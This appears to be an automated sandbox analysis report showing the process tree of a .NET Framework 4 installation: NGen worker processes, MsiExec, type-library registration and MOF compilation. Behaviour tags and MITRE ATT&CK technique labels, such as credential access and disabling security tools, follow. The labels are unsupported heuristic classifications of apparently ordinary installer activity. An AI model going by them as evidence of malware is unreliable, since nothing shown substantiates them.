  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 220 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1f0 -Comment "NGen Worker Process"
      4⤵
      PID:1360
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 22c -InterruptEvent 0 -NGENProcess 238 -Pipe 214 -Comment "NGen Worker Process"
      4⤵
      PID:2312
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 218 -InterruptEvent 0 -NGENProcess 244 -Pipe 23c -Comment "NGen Worker Process"
      4⤵
      PID:2384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 0 -NGENProcess 220 -Pipe 244 -Comment "NGen Worker Process"
      4⤵
      PID:2532
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 0 -NGENProcess 1c0 -Pipe 250 -Comment "NGen Worker Process"
      4⤵
      PID:1452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 254 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1c0 -Comment "NGen Worker Process"
      4⤵
      PID:1508
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 0 -NGENProcess 248 -Pipe 254 -Comment "NGen Worker Process"
      4⤵
      PID:2656
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 258 -Pipe 248 -Comment "NGen Worker Process"
      4⤵
      PID:1712
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 25c -Pipe 264 -Comment "NGen Worker Process"
      4⤵
      PID:300
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 0 -NGENProcess 220 -Pipe 26c -Comment "NGen Worker Process"
      4⤵
      PID:2612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 24c -Pipe 25c -Comment "NGen Worker Process"
      4⤵
      PID:1776
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 280 -Pipe 228 -Comment "NGen Worker Process"
      4⤵
      PID:2120
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 278 -Pipe 270 -Comment "NGen Worker Process"
      4⤵
      PID:588
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 0 -NGENProcess 1d8 -Pipe 208 -Comment "NGen Worker Process"
      4⤵
      PID:848
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 0 -NGENProcess 260 -Pipe 218 -Comment "NGen Worker Process"
      4⤵
      PID:2384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 280 -Pipe 258 -Comment "NGen Worker Process"
      4⤵
      PID:2412
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 278 -Pipe 24c -Comment "NGen Worker Process"
      4⤵
      PID:2652
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 294 -InterruptEvent 0 -NGENProcess 230 -Pipe 228 -Comment "NGen Worker Process"
      4⤵
      PID:1776
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 0 -NGENProcess 1d8 -Pipe 260 -Comment "NGen Worker Process"
      4⤵
      PID:912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 220 -Pipe 27c -Comment "NGen Worker Process"
      4⤵
      PID:2408
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 0 -NGENProcess 28c -Pipe 284 -Comment "NGen Worker Process"
      4⤵
      PID:1912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 298 -Pipe 294 -Comment "NGen Worker Process"
      4⤵
      PID:1728
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 0 -NGENProcess 2ac -Pipe 230 -Comment "NGen Worker Process"
      4⤵
      PID:2532
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 288 -Pipe 2a0 -Comment "NGen Worker Process"
      4⤵
      PID:2304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 0 -NGENProcess 280 -Pipe 220 -Comment "NGen Worker Process"
      4⤵
      PID:2548
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 288 -Pipe 298 -Comment "NGen Worker Process"
      4⤵
      PID:2540
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 274 -Pipe 2bc -Comment "NGen Worker Process"
      4⤵
      PID:1776
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 0 -NGENProcess 2b0 -Pipe 274 -Comment "NGen Worker Process"
      4⤵
      PID:2384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 28c -Pipe 2b0 -Comment "NGen Worker Process"
      4⤵
      PID:1936
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 0 -NGENProcess 2a4 -Pipe 28c -Comment "NGen Worker Process"
      4⤵
      PID:3024
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 0 -NGENProcess 290 -Pipe 2a4 -Comment "NGen Worker Process"
      4⤵
      PID:344
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 0 -NGENProcess 278 -Pipe 290 -Comment "NGen Worker Process"
      4⤵
      PID:2476
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 2b8 -Pipe 278 -Comment "NGen Worker Process"
      4⤵
      PID:2128
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 0 -NGENProcess 2c0 -Pipe 2b8 -Comment "NGen Worker Process"
      4⤵
      PID:1712
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 0 -NGENProcess 2c4 -Pipe 2c0 -Comment "NGen Worker Process"
      4⤵
      PID:2212
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 2c4 -Comment "NGen Worker Process"
      4⤵
      PID:1416
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 0 -NGENProcess 2cc -Pipe 2c8 -Comment "NGen Worker Process"
      4⤵
      PID:2668
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 0 -NGENProcess 2d0 -Pipe 2cc -Comment "NGen Worker Process"
      4⤵
      PID:1452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2e8 -InterruptEvent 0 -NGENProcess 280 -Pipe 2e4 -Comment "NGen Worker Process"
      4⤵
      PID:344
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 0 -NGENProcess 2d4 -Pipe 2d0 -Comment "NGen Worker Process"
      4⤵
      PID:1000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2e0 -InterruptEvent 0 -NGENProcess 2e8 -Pipe 2d8 -Comment "NGen Worker Process"
      4⤵
      PID:2136
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 0 -NGENProcess 29c -Pipe 2e8 -Comment "NGen Worker Process"
      4⤵
      PID:2324
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 0 -NGENProcess 2e0 -Pipe 29c -Comment "NGen Worker Process"
      4⤵
      PID:2984
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 0 -NGENProcess 2f8 -Pipe 2e0 -Comment "NGen Worker Process"
      4⤵
      PID:2996
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 0 -NGENProcess 2ec -Pipe 2f8 -Comment "NGen Worker Process"
      4⤵
      PID:2292
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 2a8 -Pipe 2ec -Comment "NGen Worker Process"
      4⤵
      PID:2532
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 20c -InterruptEvent 0 -NGENProcess 2ac -Pipe 2a8 -Comment "NGen Worker Process"
      4⤵
      PID:2120
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 0 -NGENProcess 200 -Pipe 20c -Comment "NGen Worker Process"
      4⤵
      PID:2136
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 200 -Comment "NGen Worker Process"
      4⤵
      PID:2524
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f8 -InterruptEvent 0 -NGENProcess 2ac -Pipe 1e8 -Comment "NGen Worker Process"
      4⤵
      PID:664
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1d8 -Pipe 2ac -Comment "NGen Worker Process"
      4⤵
      PID:2132
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b8 -InterruptEvent 0 -NGENProcess 1f8 -Pipe 1d8 -Comment "NGen Worker Process"
      4⤵
      PID:2384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 0 -NGENProcess 1ec -Pipe 1f8 -Comment "NGen Worker Process"
      4⤵
      PID:1416
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 144 -InterruptEvent 0 -NGENProcess 1b8 -Pipe 1ec -Comment "NGen Worker Process"
      4⤵
      PID:2652
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c8 -InterruptEvent 0 -NGENProcess 198 -Pipe 1b8 -Comment "NGen Worker Process"
      4⤵
      PID:2164
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 204 -InterruptEvent 0 -NGENProcess 144 -Pipe 198 -Comment "NGen Worker Process"
      4⤵
      PID:2192
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 1c8 -Pipe 144 -Comment "NGen Worker Process"
      4⤵
      PID:2076
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 0 -NGENProcess 270 -Pipe 264 -Comment "NGen Worker Process"
      4⤵
      PID:576
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 0 -NGENProcess 26c -Pipe 270 -Comment "NGen Worker Process"
      4⤵
      PID:1452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 0 -NGENProcess 268 -Pipe 26c -Comment "NGen Worker Process"
      4⤵
      PID:2204
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 224 -InterruptEvent 0 -NGENProcess 250 -Pipe 268 -Comment "NGen Worker Process"
      4⤵
      PID:1216
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 0 -NGENProcess 244 -Pipe 250 -Comment "NGen Worker Process"
      4⤵
      PID:2136
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 204 -InterruptEvent 0 -NGENProcess 224 -Pipe 244 -Comment "NGen Worker Process"
      4⤵
      PID:1184
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 0 -NGENProcess 1e4 -Pipe 224 -Comment "NGen Worker Process"
      4⤵
      PID:2652
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 204 -Pipe 1e4 -Comment "NGen Worker Process"
      4⤵
      PID:1984
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c8 -InterruptEvent 0 -NGENProcess 1fc -Pipe 204 -Comment "NGen Worker Process"
      4⤵
      PID:488
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 0 -NGENProcess 210 -Pipe 1fc -Comment "NGen Worker Process"
      4⤵
      PID:2000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 0 -NGENProcess 1c8 -Pipe 210 -Comment "NGen Worker Process"
      4⤵
      PID:1496
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 17c -InterruptEvent 0 -NGENProcess 280 -Pipe 1c8 -Comment "NGen Worker Process"
      4⤵
      PID:2864
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 0 -NGENProcess 1f4 -Pipe 280 -Comment "NGen Worker Process"
      4⤵
      PID:1300
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent c4 -InterruptEvent 0 -NGENProcess 17c -Pipe 1f4 -Comment "NGen Worker Process"
      4⤵
      PID:2640
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 0 -NGENProcess 21c -Pipe 17c -Comment "NGen Worker Process"
      4⤵
      PID:488
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding ED917117FDF3855F8196F1294E815190 M Global\MSI0000
  2⤵
  PID:1032
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe" -msi -ia -v
    3⤵
    PID:2372
  - - C:\Windows\system32\wevtutil.exe
      um C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man
      4⤵
      PID:1840
  - - C:\Windows\system32\wevtutil.exe
      im C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      PID:1720
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.JScript.tlb"
    3⤵
    PID:2612
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoree.tlb"
    3⤵
    PID:2232
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"
    3⤵
    - Executes dropped EXE
    PID:2136
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Drawing.tlb"
    3⤵
    PID:956
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.EnterpriseServices.tlb"
    3⤵
    PID:1452
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.tlb"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.Forms.tlb"
    3⤵
    PID:912
- - C:\Windows\system32\wbem\mofcomp.exe
    "C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel.mof"
    3⤵
    PID:1012
- - C:\Windows\system32\wbem\mofcomp.exe
    "C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel35.mof"
    3⤵
    PID:2992
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 861CE4DB5C7EA2A6DE00FCC0994D03F5 M Global\MSI0000
  2⤵
  PID:1920
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v
    3⤵
    PID:2644
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.JScript.tlb"
    3⤵
    PID:112
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.tlb"
    3⤵
    PID:1496
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"
    3⤵
    PID:2184
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.tlb"
    3⤵
    PID:2648
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.tlb"
    3⤵
    PID:2656
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.tlb"
    3⤵
    PID:2320
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.tlb"
    3⤵
    PID:756
- - C:\Windows\SysWOW64\wbem\mofcomp.exe
    "C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel.mof"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\wbem\mofcomp.exe
    "C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel35.mof"
    3⤵
    PID:1840

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
1⤵
PID:1696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
1⤵
PID:1732

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery